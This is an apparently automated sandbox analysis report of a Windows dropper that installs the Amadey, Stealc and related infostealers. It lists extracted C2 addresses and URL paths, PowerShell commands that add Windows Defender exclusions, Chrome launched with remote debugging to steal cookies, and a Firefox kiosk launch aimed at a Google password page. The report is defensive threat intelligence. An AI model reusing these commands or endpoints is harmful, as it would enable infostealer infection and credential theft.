Analysis

  • max time kernel
    141s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-12-2024 17:08

General

  • Target

    file.exe

  • Size

    2.9MB

  • MD5

    f8fc64f50be9ac7c2757ae0dc1fecae9

  • SHA1

    a8548a7fe4db8133e0287aa0e0e30c22bd607268

  • SHA256

    5272aae23b880e421efde22a6abb98dc13a20bf5101fb0391d8981be82d1c1dd

  • SHA512

    a4a15b36105b05b1fe82b3da36412fd8f464341d04c6d3e8c4d66736b89965d15b8df0c342164b2f6653aed62848a8c89aa716d567fd0581d8ce3928aa9f06b3

  • SSDEEP

    24576:ed/VVseAYPHvO7oh0V0nqKd/66xjvvtAvqXe4O57d7O0wtiTYLg60wZ1OpvEZP3j:o1AOH28hJyyEFO0wtIkP3yiBSwtD

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

Extracted

Family

cryptbot

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Cryptbot family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Enumerates VirtualBox registry keys 2 TTPs 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 37 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 19 IoCs
  • Drops file in Windows directory 16 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 42 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 55 IoCs
  • Modifies registry class 38 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 20 IoCs
  • Suspicious use of SendNotifyMessage 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1192
      • C:\Users\Admin\AppData\Local\Temp\file.exe
        "C:\Users\Admin\AppData\Local\Temp\file.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2532
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2916
          • C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe
            "C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1820
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath "C:\koxifkzeij"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2864
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1536
          • C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe
            "C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:272
            • C:\Windows\SysWOW64\msiexec.exe
              "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\98a59bd0eed9222b\ScreenConnect.ClientSetup.msi"
              5⤵
              • Enumerates connected drives
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              PID:1840
          • C:\Users\Admin\AppData\Local\Temp\1017743001\e8cdfa17da.exe
            "C:\Users\Admin\AppData\Local\Temp\1017743001\e8cdfa17da.exe"
            4⤵
            • Executes dropped EXE
            PID:2468
          • C:\Users\Admin\AppData\Local\Temp\1017744001\34e50cf63a.exe
            "C:\Users\Admin\AppData\Local\Temp\1017744001\34e50cf63a.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            PID:2904
          • C:\Users\Admin\AppData\Local\Temp\1017745001\6b8ce87d5a.exe
            "C:\Users\Admin\AppData\Local\Temp\1017745001\6b8ce87d5a.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:1708
            • C:\Users\Admin\AppData\Local\Temp\1017745001\6b8ce87d5a.exe
              "C:\Users\Admin\AppData\Local\Temp\1017745001\6b8ce87d5a.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2104
          • C:\Users\Admin\AppData\Local\Temp\1017746001\aefa35bba1.exe
            "C:\Users\Admin\AppData\Local\Temp\1017746001\aefa35bba1.exe"
            4⤵
            • Enumerates VirtualBox registry keys
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2096
          • C:\Users\Admin\AppData\Local\Temp\1017747001\9324174ac8.exe
            "C:\Users\Admin\AppData\Local\Temp\1017747001\9324174ac8.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            PID:1512
            • C:\Users\Admin\AppData\Local\Temp\L7EL5NTQDTLWNGA0SA.exe
              "C:\Users\Admin\AppData\Local\Temp\L7EL5NTQDTLWNGA0SA.exe"
              5⤵
              • Modifies Windows Defender Real-time Protection settings
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Windows security modification
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1236
            • C:\Users\Admin\AppData\Local\Temp\XGEQ00RT2VIDAMHTP2BWZ.exe
              "C:\Users\Admin\AppData\Local\Temp\XGEQ00RT2VIDAMHTP2BWZ.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              PID:3676
          • C:\Users\Admin\AppData\Local\Temp\1017748001\4609970f38.exe
            "C:\Users\Admin\AppData\Local\Temp\1017748001\4609970f38.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            PID:2468
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
              5⤵
              • Uses browser remote debugging
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              PID:3004
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1289758,0x7fef1289768,0x7fef1289778
                6⤵
                  PID:1656
                • C:\Windows\system32\ctfmon.exe
                  ctfmon.exe
                  6⤵
                    PID:932
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 --field-trial-handle=1180,i,5065634574165667049,4355346751720445177,131072 /prefetch:2
                    6⤵
                      PID:1580
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1180,i,5065634574165667049,4355346751720445177,131072 /prefetch:8
                      6⤵
                        PID:632
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1592 --field-trial-handle=1180,i,5065634574165667049,4355346751720445177,131072 /prefetch:8
                        6⤵
                          PID:2964
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2240 --field-trial-handle=1180,i,5065634574165667049,4355346751720445177,131072 /prefetch:1
                          6⤵
                          • Uses browser remote debugging
                          PID:1724
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2508 --field-trial-handle=1180,i,5065634574165667049,4355346751720445177,131072 /prefetch:1
                          6⤵
                          • Uses browser remote debugging
                          PID:2952
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2516 --field-trial-handle=1180,i,5065634574165667049,4355346751720445177,131072 /prefetch:1
                          6⤵
                          • Uses browser remote debugging
                          PID:1284
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1460 --field-trial-handle=1180,i,5065634574165667049,4355346751720445177,131072 /prefetch:2
                          6⤵
                            PID:3256
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                          5⤵
                          • Uses browser remote debugging
                          • Enumerates system info in registry
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          PID:6028
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feec5c9758,0x7feec5c9768,0x7feec5c9778
                            6⤵
                              PID:6092
                            • C:\Windows\system32\ctfmon.exe
                              ctfmon.exe
                              6⤵
                                PID:6456
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1188 --field-trial-handle=1388,i,1665562804773790468,3606099460868906310,131072 /prefetch:2
                                6⤵
                                  PID:6500
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1540 --field-trial-handle=1388,i,1665562804773790468,3606099460868906310,131072 /prefetch:8
                                  6⤵
                                    PID:6516
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1636 --field-trial-handle=1388,i,1665562804773790468,3606099460868906310,131072 /prefetch:8
                                    6⤵
                                      PID:3312
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2352 --field-trial-handle=1388,i,1665562804773790468,3606099460868906310,131072 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:6684
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2508 --field-trial-handle=1388,i,1665562804773790468,3606099460868906310,131072 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:6728
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2516 --field-trial-handle=1388,i,1665562804773790468,3606099460868906310,131072 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:6776
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1188 --field-trial-handle=1388,i,1665562804773790468,3606099460868906310,131072 /prefetch:2
                                      6⤵
                                        PID:3568
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\Documents\GDAAKFIDGI.exe"
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:7408
                                      • C:\Users\Admin\Documents\GDAAKFIDGI.exe
                                        "C:\Users\Admin\Documents\GDAAKFIDGI.exe"
                                        6⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:7384
                                  • C:\Users\Admin\AppData\Local\Temp\1017749001\8bece82bda.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1017749001\8bece82bda.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    PID:3088
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM firefox.exe /T
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      PID:4052
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM chrome.exe /T
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      PID:3468
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM msedge.exe /T
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      PID:3540
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM opera.exe /T
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      PID:3588
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM brave.exe /T
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      PID:3628
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                      5⤵
                                        PID:1456
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                          6⤵
                                          • Checks processor information in registry
                                          • Modifies registry class
                                          • Suspicious use of FindShellTrayWindow
                                          • Suspicious use of SendNotifyMessage
                                          PID:3100
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3100.0.507620385\584827389" -parentBuildID 20221007134813 -prefsHandle 1212 -prefMapHandle 1096 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac72e49c-05be-4bb9-b3fc-3611b4f1a880} 3100 "\\.\pipe\gecko-crash-server-pipe.3100" 1320 f6df358 gpu
                                            7⤵
                                              PID:3900
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3100.1.182312116\1331862548" -parentBuildID 20221007134813 -prefsHandle 1552 -prefMapHandle 1548 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {50d7a2fa-33d2-4ebc-bbc4-0007a9d7a052} 3100 "\\.\pipe\gecko-crash-server-pipe.3100" 1564 f606e58 socket
                                              7⤵
                                                PID:3964
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3100.2.1083414858\919689376" -childID 1 -isForBrowser -prefsHandle 1948 -prefMapHandle 1944 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 768 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e867ca68-3f1f-458d-8f40-fadb374bf642} 3100 "\\.\pipe\gecko-crash-server-pipe.3100" 2032 18a53558 tab
                                                7⤵
                                                  PID:4064
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3100.3.1054274990\437100403" -childID 2 -isForBrowser -prefsHandle 1872 -prefMapHandle 808 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 768 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c342af2e-5335-48c6-b662-ef12fc48c2f1} 3100 "\\.\pipe\gecko-crash-server-pipe.3100" 2612 1b022a58 tab
                                                  7⤵
                                                    PID:3740
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3100.4.1803940182\7296702" -childID 3 -isForBrowser -prefsHandle 792 -prefMapHandle 1120 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 768 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc00a5a0-b889-43c1-a568-d57bac28322a} 3100 "\\.\pipe\gecko-crash-server-pipe.3100" 3052 f6ded58 tab
                                                    7⤵
                                                      PID:10076
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3100.5.1853457759\912734357" -childID 4 -isForBrowser -prefsHandle 3572 -prefMapHandle 3492 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 768 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b34908b0-f993-4b68-b03c-31c21ad68bd1} 3100 "\\.\pipe\gecko-crash-server-pipe.3100" 3584 1b544758 tab
                                                      7⤵
                                                        PID:10088
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3100.6.1299507573\398982705" -childID 5 -isForBrowser -prefsHandle 3740 -prefMapHandle 3736 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 768 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5383a84f-d9e2-407a-9f5c-471a4281a443} 3100 "\\.\pipe\gecko-crash-server-pipe.3100" 3752 1f110d58 tab
                                                        7⤵
                                                          PID:10164
                                                  • C:\Users\Admin\AppData\Local\Temp\1017750001\a2606123e7.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1017750001\a2606123e7.exe"
                                                    4⤵
                                                    • Modifies Windows Defender Real-time Protection settings
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Windows security modification
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3748
                                                  • C:\Users\Admin\AppData\Local\Temp\1017751001\9adbb32a6a.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1017751001\9adbb32a6a.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:5868
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" Add-MpPreference -ExclusionPath "C:\oosbuz"
                                                      5⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3572
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                                                      5⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4104
                                                  • C:\Users\Admin\AppData\Local\Temp\1017752001\2b5fc4352d.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1017752001\2b5fc4352d.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4544
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                                                      5⤵
